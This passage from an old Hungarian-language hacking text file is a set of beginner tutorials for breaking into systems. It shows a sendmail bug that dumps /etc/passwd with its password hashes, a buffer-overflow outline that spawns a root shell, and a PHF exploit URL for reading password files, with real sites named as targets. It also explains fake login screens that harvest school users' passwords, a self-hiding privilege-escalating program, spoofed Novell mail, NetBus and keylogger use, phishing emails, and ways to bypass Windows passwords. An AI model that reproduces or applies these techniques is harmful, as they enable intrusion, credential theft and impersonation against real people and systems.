/etc/passwd" parancsot, akkor meg is lenne. Csakhogy ilyen sosincs. Ezért 16. oldal

win98.TXT kell találnod egy olyan programot, aminek hibája van, és SUID root... Vagyis, p éldául a sendmail. Tudni kell róla, hogy suid root, és hogy NOBODY is futtathatja. Néhány verziója tarta lmaz olyan hibát, hogy ha rossz tipusú file-nevet adsz meg neki, vagyis egy file-t, a miben olyan adatok vannak, amit nem tud azonosítani, akkor kiírja azokat a sorokat a képernyõre, és mellé ír valami ilyesmit: "unknown control line". Gondolkozz csak el rajta... Milyen érdekesen fel lehetne ezt használni. A config file-t a "-C" paraméterrel defin iálod. Például: senmdail -C sendmail.configfile De van egy érdekes ötletünk: Mivan ha ezt írom be neki??: sendmail -C /etc/passwd Öromunkre pl. ezt látjuk: /etc/passwd: line 1: unknown control line "root:e15LU2L6FLhxB:0:0:root:/root:/bin/bash" /etc/passwd: line 2: unknown control line "bin:*:1:1:bin:/bin:" /etc/passwd: line 3: unknown control line "daemon:*:2:2:daemon:/sbin:" /etc/passwd: line 4: unknown control line "adm:*:3:4:adm:/var/adm:" /etc/passwd: line 5: unknown control line "lp:*:4:7:lp:/var/spool/lpd:" /etc/passwd: line 6: unknown control line "sync:*:5:0:sync:/sbin:/bin/sync" /etc/passwd: line 7: unknown control line "shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown" /etc/passwd: line 8: unknown control line "halt:*:7:0:halt:/sbin:/sbin/halt" /etc/passwd: line 9: unknown control line "mail:*:8:12:mail:/var/spool/mail:" /etc/passwd: line 10: unknown control line "news:*:9:13:news:/var/spool/news:" /etc/passwd: line 11: unknown control line "uucp:*:10:14:uucp:/var/spool/uucp:" /etc/passwd: line 12: unknown control line "operator:*:11:0:operator:/root:" /etc/passwd: line 13: unknown control line "games:*:12:100:games:/usr/games:" /etc/passwd: line 14: unknown control line "gopher:*:13:30:gopher:/usr/lib/gopher-dat a:" /etc/passwd: line 15: unknown control line "ftp:*:14:50:FTP User:/home/ftp:" /etc/passwd: line 16: unknown control line "nobody:*:99:99:Nobody:/:" /etc/passwd: line 17: unknown control line "user:pH1j.C9qFtqxz:500:500:user,user,user ,user,:/home/user:/bin/bash" No local mailer defined. QueueDirectory (Q) option must be set. A legújabb verziókban ez már nem mûxik, mert kijavították a hibát, és ha user f uttatja, akkor megnezi, hogy õ a root, vagy nem. Ha nem õ a root, akkor csinál egy olyan húzást, hogy "setuid(uid);". Namost ez a suid programunk UID-jét átv áltoztatta a uid UID-re. Vagyis ha a te uid-d 111, akkor már nem a root uid-jével fog futni a további CODE, hanem a sajátoddal. Buffer overflow: Szóval, itt arról van szó, hogy allokálsz, vagyis kijelzel egy memória helyet az adat aidnak: Egy egyszerû C program: #include char buffer[200]; <- itt adod meg, hány byte fér bele void main() { strcpy(buffer,"kecske"); <- belehelyezem a kecske szót a bufferbe printf("%s",buffer); <- megnézem a buffer tartalmát. } Most beletettem a strcpy-val a buffer-be 6 byte-ot (a kecske szót). De mi van, ha töb bet teszek bele (például: gets(buffer);) ? Kicsordul a buffer... Namost. Vannak úgynevezett REGISTER-ek. Az egyik a legfontosabb a mi esetünkben az IP , vagy úgy is hívják EIP. Ebben van egy szám, ami azt jelzi, melyik következõ parancsot futtassa a memóriában. Ha ezt átírjuk, azt futtatunk le a memóriában, amit akarunk! Vagyis: addig töltjük a buffert (vagyis õ már nem a buffer, csak inne n indult ki), amíg el nem jutunk az EIP-ig. Ezután beleírjuk a számot, ahol folytatódik a buffer az EIP után. Így néz ki vázlatosan: .-------------------------- buffer -----------------------. .-------- EIP -------. | | | | 414141414141414141414141414141414141414141414141412000909090909090909090 | | 1234 1244 Vagyis ahogy eléri a buffer az eip-t, belehelyezi a 2000-es számot, azt a memória hel yet, ahol folytatódik a buffer az eip után. Tehat most nem valamilyen program fog fut ni, hanem a 0x90-NOP, ami azt jelenti, hogy NO processz, vagyis nem csinál semmit. Na de ide behelyezhetsz egy olyan parancsot, hogy pl.: execl("/bin/sh",NULL); <- ezt természetesen át kell alakítanod hexre. Ezzel lefuttatod a shellt, és ha a program - amiben a buffer volt - SUID root, akkor a shell is suid root lesz, vagyis a uid-d 0. Ez csak egy egyszerû vázlat volt, pontosabban elmagyarázni assembler tudás nélkül nehéz lenne. Nem biztos, hogy érthetõ volt a memória pointáció, elmagyarázom külön: Például van 10 darab üres helyed, amibe tehetsz bármit. De csak egy byte-nyit. Ez így fog kinézni: A B C D E F G H I J | | | | | | | | | | 1 2 3 4 5 6 7 8 9 10 Az elsõben egy A betû van, vagyis 0x41 hexben... A masodikban B, 17. oldal

win98.TXT vagyis 0x42 hexben. És az 1,2,3...10: ezek voltak a mutatók, mert te az 5. pohárba is tehetsz külön valamit, és az 5 az a memory pointer, úgy mint az el&o tilde;zõ ábrán az 1234 vagy az 1244. Remélem ebbõl meg lehetett érteni... Így például lehetséges olyan hiba is (ami szinte kizárt, mert ennyire azért nem hülye k a programozók, de volt már rá példa...) hogy az ftp-nél... Be kell jelentkezned a username-mel és a password-del. Tehát tételezzük fel, hogy a p rogramozók a username-re feltetelezték, hogy nem lesz nagyobb, mint 100 byte, és nem kontrollálja le a program, hogy nem nagyobb-e a kívánt adat. Ilyenkor lehúzod a progr amot felinstallálod. Lepróbálod, hányádik byte a bufferban az eip, aztán felteszed a shellt. És kész az exploit... Felteszed a lábad az asztalra, és elindítod... És ha a futó ftp program root jogokkal fut, akkor te szép csendben ROOT vagy. És szin te semmit sem kell hozzá csinálnod. És a leggyönyörûbb az ilyen dolgokban az, h ogy nem loggol semmi. Mert nem futtattad a /bin/login-t, tehat nem fut le sem a .bash _history <- vagyis nem loggol semmi parancsot, amit kiadtál. A "w" parancsra, ami megnézi, milyen felhasználók vannak fent, nem reagál, mert amint már mondtam: nem használtál logint! Csak egyetlen mód van arra, hogy valaki gyanút fo gjon: "netstat". Ez megmutatja az összes tcp/ip kapcsolatot. Vagypedig a "tcpdump". E setleg még akkor, ha egy speciális software van a gépen, ami loggol minden tcp/ip pac ketot. De ki fogna gyanút? Hiszen minden root istennek hiszi magát, és azt hiszi, a gépe tör hetetlen... Csakhogy téved! :) A következõ hack tipp: Van például egy program, ami megengedi, hogy végtelen sok username-et és passwordöt p róbálhass ki rajta. Ekkor csinálsz egy programot, ami kiprobálja az összes lehetséges passwordöt: aaaaa aaaab aaaac ... ... bbbbb bbbbc ... Satöbbi... Szóval ez egy másik módszer, de baj van, ha nem válaszol, hogy jó-e a username. Mert ha nem válaszol, akkor képzelheted, a világ összes legjobb számítógépe a jelszót az u sername-mel együtt 2 év alatt törné fel... Szóval valahogy meg kell tudnunk, hogy van -e olyan username, amit keresünk. Ekkor kiprobáljuk a FINGER daemont. Az ritkan, mond juk 20%-ban van. Ha nincs, akkor sendmail. Van egy olyan parancs, hogy VRFY (verify). Ez megmutatja, létezik-e olyan felhasználó, akinek a mail-t akarom küldeni. Tehát: VRFY aaaa VRFY aaab VRFY aaac Satöbbi :) Így azért valamivel egyszerûbb. -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Novell Hack: -------------------------------------------------------------------------------Írta: MaD MiND Forrás: InternetLand A régi jó fake login: (elõször a történelem:) Ezt a módszert mindenki ismeri, de ha mégis valami földönkívüli lennél, elmagyarázom a lényegét. Ahol még régi szar DOS-os gépek vannak, vagy mondjuk újak, de mégse telep ítettek winfos-t, ott a belépés úgy néz ki, hogy kiírja a program, hogy Login name: a ztán meg bekérdezi a jelszót... ha rosszul gépelted be, akkor meg kiír valami hablaty ot, hogy miért nem enged be. Ez a loginolás a gépek bekapcsolásakor az autoexec-b&oti lde;l elindul, hogy mindenki kényelmesen be tudjon lépni, ne kelljen szegény felhaszn álóknak megjegyezni, hogy be kell írni, hogy "login". De persze azért nagyjából minde nki tudja hogy ezt így kell, de mégis úgy van megcsinálva, hogy a kezdetnél mindenki belépjen, hogy nyomon lehessen követni a dolgokat, meg hogy mindenki tudja használni azokat a programokat amik a hálón vannak. Na most, mi történik ha valaki melléüti a j elszavát? Jön egy üzenet, hogy nem jó. Akkor megint megpróbálja, és valószínüleg be i s lép, ha nem annyira béna, hogy kétszer elüsse. Tehát neked annyit kell csak tenned, hogy írsz egy programot, ami ugyanúgy néz ki mint az igazi beléptetõ program, annyi különbséggel, hogy mindenképp azt írja ki, hogy nem sikerült belépni (ugyanúgy ahogy az igazi beléptetõ program csinálja!). És persze egy file-ba nem felt&uc irc;nõ helyen feljegyzi a nevet és a jelszót. Azt mondanád, hogy itt vége van, de tévedsz! Mert ilyenkor odamegy a béna a tanárhoz, és azt mondja, hogy valami gondj a van, és megpróbálja rávenni a tanárt, hogy hadd lépjen be. Ha a suli szigorú, a köv 18. oldal

win98.TXT etkezõ nap a lamer már új iskolát kereshet. Mert ezt úgy kell, hogy az autoexe c.bat-ot átírod, hogy ne az igazi logint hívja be, hanem a tiedet, amit te írtál. így mindenki csak azt fogja hinni hogy elgépelte a jelszavát, és amikor másodszorra megpr óbál belépni, beírja, hogy "login", akkor már az igazi login jön be, és már be tud lé pni, neked meg csak gyûlik a fileban a felhasználók jelszava. Ennyi volt a tört énelem, most pedig jöjjön egy kis kiegészítés. Ha ezt a dolgot így eljátszod, akkor h ülye vagy, és le fogsz bukni. Ne legyél lusta, és írd bele a programba, hogy egy id&o tilde; után (bizonyos loginnév mennyiség, bizonyos idõ, egy bizonyos loginnév megszerzése után) törölje ki magát, és csináljon vissza mindent. így nem fox lebukni, ha ügyes vagy. Most pedig jöjjön a való világ. A való világ úgy néz ki, hogy nem dosos gépek vannak a suliban hanem hála a sulinetne k, ami olyan lassú, hogy szinte már semmi értelme nincs, Win95 fut a masinákon, telep ítési, program futási, és egyéb hibákat generálva a barátságos de hülye felhasználóna k. Itt már vicces lenne ha megpróbálkoznál a régi jó login.exe-vel... Viszont senki s e mondta, hogy az alapelv hibás! ;-)) Itt a következõ az ötlet: amikor bejön a vindózos beléptetõ-ablak, Ctrl+printscreennel lefényképezed a képernyõt . Lenyomod a windows gombot, behívod a paintbrusht, és bepásztázod a képernyõt . A BMP-t, amit elmentettél a képernyõrõl, hazaviszed. Otthon kiradíroz od róla az input-okat, ahova be lehet írni a nevet és a jelszót, meg a gombot ami elv ileg akkor nyomódik meg, amikor lenyomod az entert (vagy rákattintasz, persze......), meg levágod az ablak tetejét, szóval hogy csak az ablak belseje maradjon meg. Fogod a Visual Basic-et, vagy a Delphit, és nekilátsz egy windows-os fake-login megírásához. Nem kell leutánozni az egész programot, az bonyolult lenne, egyszerûen berakod háttérképnek a BMP-t, és az eredeti input-ok helyére beraksz igazi inputokat, meg a g omb helyére is, megadod, hogy ha a névnél vagy a jelszónál a beírás közben entert nyo mnak, akkor hajtódjon végre az "OK" gomb, amit szintén te raksz az ablakba. Ezután má r csak meg kell adnod, hogy az "OK" gombra ha rákattintanak, akkor mentse le egy file -ba a beírt nevet és jelszót, és lépjen ki az egész program, egy unLoad form1-gyel. L egalábbis VB-ben így kell. Még nincs vége. Megkeresed, hogy a beléptetõ progi hol van feljegyezve... lehet a windows registry-ben amit a regedit.exe-vel tudsz szer keszteni, vagy lehet az indítópultban, végülis tökmindegy hol van, a lényeg, hogy elé be kell írnod a saját programodat. így amikor valaki be akar lépni, egyszerûen elsõre nem történik semmi amikor beírja a jelszavát, egyszerûen újra bek éri a program, mintha csak elütötte volna. Legalábbis így néz ki, de valójában nem új ra bekéri, hanem a másodikra már az igazi beléptetõ programnak adja meg a jels zavát, így be is tud lépni, nem is lát semmiféle változást, és neked is megvan a név meg a jelszó. Mindezek után azért elmondanám hogy ez eléggé régi 5let, és szerintem eléggé lamer is , úgyhogy amikor csak lehet, használj más módszereket. A programok: Na igen, ez a másik lehetõség... Ez is kezdõ, de mégis már igényel némi felkészültséget, és az elõzõnél profibb. A lényege egy mondatban összef oglalható: "írj egy programot, ami megpróbál jogokat adni, ahogy azt te akarod". Pers ze ez még nem elég, hanem úgy kell megcsinálnod a programot, hogy az elinduljon az em berek tudta nélkül. Innen már kajak - egyszerû. Amikor valaki olyan neve alól f ut le a program, akinek van elég jogosultsága, annál mûködni fog a progi. Persz e most azt mondod, hogy csak dumálok a levegõbe, hogy lehetne már ilyet csinál ni, mármint megírni egy programot. Nagyon egyszerû, ugyanis itt pár sorral lejj ebb találhatsz kajakmennyiségû anyagot, amik megkönnyítik, hogy pascalban össze üss 3 sorban egy olyan programot, ami mondjuk mindenkinek ad manager jogot maga felet t, de szinte bármit megtehetsz. Ha nagy paszkálos vagy, vágni fogod. Ha nem, akkor is . Lássuk tehát, hogy mi van az étlapon! NOVELL.PAS: Egy-két alapvetõen fontos Novell meghívás, nagyon jó kezdésnek. Kö szönet RobyMu$-nak, aki kb. 4 éve elküldte nekem e-mailben! :)) NET.EXE: Akik profin akarnak nyomulni, és térdre akarják kényszeríteni a hálót, azokn ak szükségük lesz erre. Ez nem egy program, ez csak egy RAR SFX (magát kitömörít&otil de; tömörített bödöröni csöbörös böbe babe), ami tele van jobbnál jobb unitokkal, ami kkel a rendszer hierarchiáját változtathatod, és van benne példa is rendesen. Ez a le gjobb novell-kezelõ pascal csomag amivel eddig 19. oldal

win98.TXT találkoztam, minden benne van. INTE.ZIP: És ez pedig egy intelligens vírus, amivel én annak idején eléggé vicces dol gokat mûveltem a hálózaton, észrevétlenül. De szép idõk voltak azok. Iga zából ez nem is vírus, csak annyit tesz, hogy felteszi magát (mármint az inst.exe-vel lehet installálni), és utána eltûnteti magát az autoexec-bõl, ha nortonb ól nézik, szóval eléggé észrevétlen, és folyamatosan próbál jogokat teremteni magának a hálózaton. Amikor sikerül, akkor leöli magát. Érdekes, nem? Nehogy elindítsd csak ú gy a saját sulidban, mert én az AKKORI körülményekhez írtam, pl. a C:\system-ben volt a norton commander, és hasonlók, de biztos jó példának szolgál. Már totál nem emléksz em, hogy pontosan hogy is írtam, és egyébként is már vagy jó 3 éve volt ez a dolog, ú gyhogy bocsássatok meg nekem minden lamerságot, ami benne van. Egyéb finomságok: Az üzenetküldés titkai: Akik szeretnek a hálón szórakozni, azok már biztos ismerik a hálózat üzenetküld&otild e; lehetõségét. Van egy "send" nevû program, amivel üzenetet lehet külde ni egy bizonyos felhasználónak, egy csoportnak, vagy egy állomásnak, amennyiben ott n incs letiltva az üzenetfogadás. Régen sokat baromkodtunk ezzel, de sajnos mindig prob léma volt az, hogy aki az üzenetet megkapta, annak az is oda volt írva, hogy kit&otil de;l jön. Viszont kiderítettem egy érdekes dolgot: a "küldõ" kilétét nem a sze rver rakja hozzá az üzenethez, hanem maga a send.exe, amit a novellhez adnak. Tehát e zt megkerülve lazán küldhettek bárkinek idegesítõ üziket, anélkül hogy tudnák, hogy honnan jön, csak használjátok fel a NOVELL.PAS-t, írjatok egy programot, ami üze netet küld, és kész. Erre itt találhattok példát: SENDY.PAS: Itt van a program forrása, egy példa, amivel névtelenül lehet küldeni SEND Y.EXE: Ez meg maga a program, a .PAS lefordított változata, amivel tudsz küldeni névt elenül gyors üzeneteket egy usernévre. Sípoltatás: Ez pedig egy nagyon cuki program, amit én fejlesztettem ki. Úgy kezdõdött, hog y a fake-logint úgy akartam megírni, hogy tényleg be is lépjen, a novell unit felhasz nálásával. Biztos tudod, hogy kétféleképpen lehet elvileg belépni egy novell szerverr e: titkosított, vagy titkosítatlan jelszóval. Ha titkosítatlan jelszóval akarnál belé pni, meglenne a veszélye, hogy valaki leszedi a kábelrõl az adatokat most ezt eléggé leegyszerûsítve mondtam, hogy a hülye is értse), ezért a szabvány manaps ág az, hogy titkosított jelszót küldesz. Persze ezt nem te teszed, hanem a login.exe, vagy ami megkérdezi a neved meg a jelszavad, és beléptet. Viszont a NOVELL.PAS-ban me gtalálható az a rutin, ami titkosítatlanul akar beléptetni. Én egyszer megpróbáltam, és hallottam, hogy a szerver egyet sípolt, egy rövidet (mert hát anno még ugyanabban a szobában volt a szerver, ahol mi). Kiírta a képernyõre, hogy valaki titkosít atlan jelszóval próbált meg belépni, csak információképpen. A legtöbb szerver úgy van beállítva, hogy csak akkor fogadja el a belépést, ha titkosítottan küldték a jelszót. Ezt kihasználva, csináltam egy programot, ami ciklusban próbál belépni a szerverre ti tkosítatlan jelszóval, így a szerver egybefolyó csipogásai egy sípot alkotnak, magyar ul, ha elindítod a programot, a szerver sípol mint a hülye, amíg te le nem állítod! SIPOL.EXE: Ezt ha elindítod, banzáj lesz a szerverszobában. SIPOL.PAS: Ez pedig a forrása, hogy hogy kell csinálni Na persze, mint mondtam, ezek nagyon régi programjaim, és teljesen kezdõ kinéz etük van, de attól még mûködnek ;-) Névtelen levelezés: Nyilván ismered a pegasus mailert, vagy egy másik levelezõprogramot, amivel a hálón egy másik felhasználónak levelet tudsz írni? De persze sajnos nem lehet vele ny ugodtan szitkozódni, mert a másik látja, hogy tõled jött. De a levelezõ program sem isten, az is csinálja valahogy, nem?! Dehogynem. És hogy? Hát tök egyszer û. Van egy mail könyvtár, ami televan könyvtárakkal, számokból álló könyvtárakk al. Mindegyik szám valakihez tartozik (a userek hexadecimális azonosítója vagy miafas zom), és ezen belül vannak a levélfile-ok. De persze azért nem tud bárki bárkinek a l evelezésébe belepiszkítani, meg beleolvasni. Mindenkinek úgy vannak beállítva a jogai , hogy a sajátjához teljesen hozzáférjen, a másiknál meg csak file-t csinálhasson. Me rt a levél is csak egy file, pl. a pegasus mailer .CNM kiterjesztésû file-okat csinál. Tehát amikor te teszem azt írsz egy levelet a supervisor felhasználónak, akko r a megadott mail könyvtáron belül az 20. oldal

win98.TXT "1"-es könyvtárba (az mindig a supervisor könyv tára) csinál egy véletlen nevû file-t, CNM kiterjesztéssel, pl. "e6c8221b.cnm", amiben valami ilyesmi van: From: A te userneved To: Supervisor Subject: cim Hello te kocsog Amikor meg a rendszergazda pmaillel elolvassa a leveleit, a levelezõprogram me gnézi az összes .CNM file-t, és levélnek veszi õket, megnézi, hogy a "From" ut án mi van írva, és onnan tudja, hogy kitõl jött. Viszont ha te mondjuk más nev ében akarsz írni, csak annyit kell tenned, hogy bemész a könyvtárába, és bármilyen sz övegszerkesztõvel nekilátsz egy file készítésének, az a lényeg benne, hogy .CN M legyen a kiterjesztése. Hoppá.... ez még rímelt is :) Naszóval ott vagy a szerkeszt õben, és írod a leveled, de feltétlenül így kell kezdened: From: Akit utalok de nagyon, annak a userneve To: Supervisor Subject: TOROLJ KI Vigyázz arra, hogy csak egyszer mentheted el a file-t, amikor teljesen kész vagy vele , mert kétszer nem fog menni, mert ha egyszer elmented, akkor már van olyan file, és mégegyszer nem engedi a rendszer, hogy írd a file-t, mert akkor átírhatnád a leveleit szegény felhasználónak. Viszont arra vigyázz, hogy ha valaki ügyeske, és file manager -ben megnézi a file tulajdonosát, ott fog villogni a neved. Tehát nem ajánlatos tanár oknak mindenfélét küldözgetni más nevében mert talán még lebux, és akkor megbux. Visz ont jó tudni, hogy ha valaki más küld neked névtelen levelet, akkor így tudhatod meg, ki volt az. -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------UNIX jelszavak feltörése: -------------------------------------------------------------------------------1. rész - Alap UNIX parancsok: A legtöbb DOS parancsnak van UNIX ill. Linux megfelelõje. Alább láthatók a fon tosabb DOS parancsok, mellette a UNIX megfelelõjük, melyekre szükséged lehet. HELP = HELP COPY = CP MOVE = MV DIR = LS DEL = RM CD = CD Egyéb parancsok: hogy megnézd, ki más van még a hálózaton, írd be: WHO. Ha információt szeretnél egy konkrét felhasználóról, akkor használd a FINGER parancsot. Ezeket a UNIX parancsokat használva mindent megtudhatsz a rendszerrõ ;l. 2. rész - Jelszavak feltörése: UNIX alatt a file, ami tartalmazza az összes felhasználó jelszavát, az /etc könyvtárb an található. A file neve "passwd". Sejtem mit gondolsz most... "Csak annyit kell ten nem, hogy megszerzem az /etc/passw filet, és hacker leszek!" Ha tényleg ezt hiszed, a kkor hatalmasat tévedsz. Ebben a fileban az összes felhasználónévnek titkosíttott (en crypted) jelszava van. Ezek a jelszavak egyirányúan encryptáltak, ami azt jelenti, ho gy nem lehet õket visszaalakítani (decrypting) - illetve lehet, csak nagyon ne héz! Rendelkezésünkre állnak azonban olyan programok, amelyek képesek megszerezni nek ünk a jelszavakat a fileból. A leghíresebb ilyen program a "Cracker Jack" névre hallg at. Ez a program egy szótárat használ, mely több ezer szóból lett összeállítva. Ezeke t próbálgatja végig... A Cracker Jack letölthetõ itt. Néhány szótár pedig a kö vetkezõ ftp siteon: ftp://sable.ox.ac.uk/pub/wordlists. A 0294-es számú szótár at pedig itt találod. Miután letöltötted a "calleddic-0294.tar.Z" filet (kb. 4 MB), k i kell tömörítened, pl. Gzip (DOS) vagy a WinZip (Windows) programmal. A kitömörítés után egy csomó szövegfilet kell kapnod (összesen kb. 8 MB), és ezeket tedd azonos kön yvtárba a cracker programmal. Ha nem tudod használni Cracker Jack-et olvasd el a mell ékelt dokumentációt, ebbõl meg lehet tanulni a használatát. 3. rész - A nehéz rész (a jelszófileok megtalálása): Eddig egyszerû volt, most jön a nehéz rész. A józan ész. A rendszergazda nem fo gja csak úgy odaadni neked azt a filet, amiben az összes felhasználója a jelszavát tá rolja. Tehát kell, hogy legyen valami külsõ út a /etc/passwd filehoz anélkül, hogy be kellene lépned a rendszerbe (login). Két egyszerû út létezik. Gyakran a z /etc könyvtár nincs elzárva az FTP elõl. Szóval próbálj meg belépni egy anon ym FTP klienssel az /etc könyvtárba. Ha sikerül, töltsd le a filet, és futtasd le raj ta a Cracker Jack-et. Ha nem sikerül az FTP klienssel belépni az /etc könyvtárba, akk or jöhet a B terv. Némelyik rendszernél van egy PHF nevû file a /cgi-bin könyvt árban. Ha a találsz ilyet, akkor szerencséd van. Ugyanis a PHF 21. oldal

win98.TXT engedélyezi a felhaszn álóknak, hogy a hozzáférjenek fileokhoz (beleértve az /etc/passwd filet) az internete n át. Tehát ha ez megvan, indítsd el a webböngészõdet, és menj a "http://xxx.x xx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd" címre, ahol az x-ek helyére írd a server címét, amit hackleni akarsz. Tehát, ha pl. a St. Louis University-t szeretné d meghackelni, akkor a "http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/pas swd" címet írd be. Természetesen ezzel a címmel már nem fog menni, ugyanis már ki van javítva a hiba. Itt egy tipp: próbáld a www.spawn.com vagy a www.garply.com címeket. Ha az itt leírtak alapján sem tudod megszerezni a passw filet, akkor légy kreatív, és próbáld megszerezni bármi más úton-módon. Ha megvan a file, de benne az összes elembe n a második helyen "x", "!", vagy "*" van, akkor a jelszó le van árnyékolva (shadowin g). Az árnyékolás egy extra titkosítás, a file illetéktelen felhasználása ellen. Sajn os az "unshadowing" gyakorlatilag lehetetlen, de néha van biztonsági másolat (backup) a fileról, amelyben a jelszavak nincsenek árnyékolva. Ezeket pl. az /etc/shadow és ha sonló könyvtárakban keresd. 4. rész - Belépés a rendszerbe: Ok... Most használhatod azt, amit a Cracker Jack kiszedett a fileból. Felhasználóneve k és jelszavak. Elõször is fogd a telnet kliensed, és telnetelj be a szerver 7 9-es portjára, ahonnan a passw fileod származik (pl. www.slu.edu). Miután csatlakoztá l egy belépõ képernyõt (login screen) kapsz, ami felhsználónevet és jel szót kér, és általában valami infot a szerveren futó op.rendszerrõl (általában UNIX, linux, aix, irix, ultrix, bsd, vagy néha DOS, esetleg Vax / Vms). Ezután már kö nnyû dolgod van, felhasználónevek és jelszavak közül válogathatsz... De emlékez z, hogy a hackelés nem a vírusokból és a károkozásból áll, hanem, hogy a tudásod segí tségével mégtöbb tudásra tégy szert ("using your knowledge to increase your knowledge "). -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------UNIX/Linux passwd fájl felépítése: -------------------------------------------------------------------------------Írta: H3XR00T Forrás: Mielõtt a vén rókák elkezdenének suxxolni, le kell, hogy szögezzem, hogy ez a doksi a kezdõknek készült! Õk meg használják egészséggel! :) Itt f&otil de;leg a shadowolt és a nem shadowolt passwd fileok különbségérõl lesz szó. Ma rha nagy... csak egy "x" vagy "*" :) Elõször is. A linux passwd filejai ezekben a könyvtárakban találhatóak valahol : /etc/passwd vagy az etc/shadow. Ezekhez ha hozzáférsz, akkor kb. az alábbi eredmény t láthatod, ha nincsenek shadowolva a jelszavak: az alábbi passwd file a CS.HU-ról le tt leszedve. admin:aaKRsX3J.tvTU:[email protected]:Webmaster:30/9/1999:never:top Nos nézzü k, mi mit jelent! admin: Ez a felhasználói név. Itt most admin. A névbõl ítélve valami nagy feje s lehet... :) aaKRsX3J.tvTU: Ez a furcsa karakterekbõl álló betûhalmaz a jelszó. No mi elõtt mindenki vadul elkezdene telnetelni a szolgáltató 79-es portjára, elárul om, hogy ez kódolt jelszó, és még meg kell fejteni valami unix passwd törõ pro gival, mondjuk a John the Ripperrel vagy a Cracker Jack, stb. programokkal. :::::::: Az ezek után jövõ kettõspontokkal és egyéb marhaságokkal, amik köztük v annak, azokkal ne folgalkozz! :) Kiegészítés: Valahol a jelszó után egy ":"-tal elvál asztva van egy vagy több szám is. Pl. így: admin:aaKRsX3J.tvTU:253:10:CSAdmin:/cs/admin/www:bin/sh Ilyen esetben az egyes mezõk ezeket jelentik: Felhasználói név: admin Kódolt jelszó: aaKRsX3J.tvTU Azonosító szám: 253 Csoportazonosító: 10 GCOS mezõ: CSAdmin 22. oldal

win98.TXT Home könyvtár: /cs/admin/www Kezdeti shell: /bin/sh No igen. De már hallom is a kérdést, hogy "én is szereztem egy ilyen passwd filet de nem egészen ilyen formátumú...". Ha ez az eset áll fent, akkor te valószínûleg egy shadowed passwd filet szereztél meg. (Vagy ha nem, akkor kérdezd meg a rendszerga zdát, hogy mégis õ tudja-e, hogy milyen passwd filet szereztél meg tõlü k :)) Hogy is néz ki ez valójában? root:x:0:0:root:/root:/bin/bash Mint látható, sokkal rövidebb és a krixkrax karaktereket felváltotta egy x (szokott * is lenni). Nézzük meg, hogy ebben a felállásban mi micsoda: root: Ez még mindig az a felhasználói név, amire minden hacker/cracker/istentudjami á hitozik. :) x: Hoppááááááááá. Mivel a passwd file shadowolva van, ezért a rejtjelezett jelszót fe lváltotta egy "x" karakter. root:/root:/bin/bash: Ez elvileg a shell, amit a user használhat, kaphat. -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------A szerverhez hasonlóan használhatjuk a Brutus-t, ami erre is képes. De az a legjobb, én ezt használom, hogy a NetBus-t ráállítom a gépre (természetesen a server rész már el van indítva), és leülök a szemben lévõ géphez (sulikban + könyvtárakban), a honnan mindent láthatok. Figyelem tehát, mikor ül oda valaki levelezni, és akkor jön a NetBus Listen. Így én is szereztem egy pár usernamet és passwordöt. Persze az is tu ti módszer, hogy egy keyloggert rányomsz a gépre, aztán megvárod míg a tag befejezi a netezést, és a végén kiolvasod a log file-ból a dolgait. A lamer módszer: Ok, tudom, hogy ez hülyeség, de hátha valakinek ez jön be... Szóval regisztrálj egy c ímet, lehetõleg abban a levelezõ rendszerben, ahol az áldozatnak is cím e van. azonosítónak válassz valami operator, administrator, hasonló nicket. Írj az ál dozatnak egy kamu levelet, hogy te vagy az operator, és a rendszer átépítés miatt kel l a jelszava, stb. Természetesen te ne add meg így a jelszavad, mivel a szolgáltatók SOHASEM kérdik meg e-mailben a jelszavad - miért tennék, ha övék a rendszer, és a lev eleidet is simán elolvashatják -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Magic 1.3 Biosok mastercodeja: Forrás: InternetLand Nem sok gépen van ilyen, de néha nagyon bejön... A profibb lebujokban ilyen is van, e zeknek a master passwordje, amik ezeken a mac gépeken mennek, az a következõ h osszú gány, ezt nyomtasd ki, és írd be, ha kell: rJeZmhaSlI -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Jelszó eltüntetése Windowsról: Legegyszerûbb egy olyan rendszerbe bejutni, amit nem védenek jelszavak, vagy vé denek, de azt hiszik, hogy nem kell. Hogy ezt hogyan érheted el, az itt áll: I. Jelszófile buherálása Egyszerûen átnevezed a jelszófilet. Ezeket a win32-es rendszerek .pwl kiterjesz tésû fileokban tároljak a %winbootdir% könyvtárban (dir %winbootdir%-el megkapo d, hogy melyik könyvtárat keresed). Az Ikonok elrendezése -> Típus szerintet használv a lehet ezeket legegyszerûbben megtalálni. Téged gondolom az administrator jels zava érdekel; ez az administ.pwl-ben van tárolva. Ezt megkeresed, átnevezed, kilogols z, és administratorként bemehetsz jelszó nélkül. II. System.ini buherálása Szintén a %winbootdir%-ben található egy System.ini nevû rejtélyes file :). Ebb en található egy "[Password Lists]" tartalmú sor. Ez alatt valami olyasmi van, hogy: [Password Lists] KARCSI=C:\WINDOWS\KARCSI.PWL ADMINISTRATOR=C:\WINDOWS\ADMINIST.PWL (A jelszófile neve mindig a felhasználónév elsõ 8 karaktere, szóközök nélül. K 23. oldal

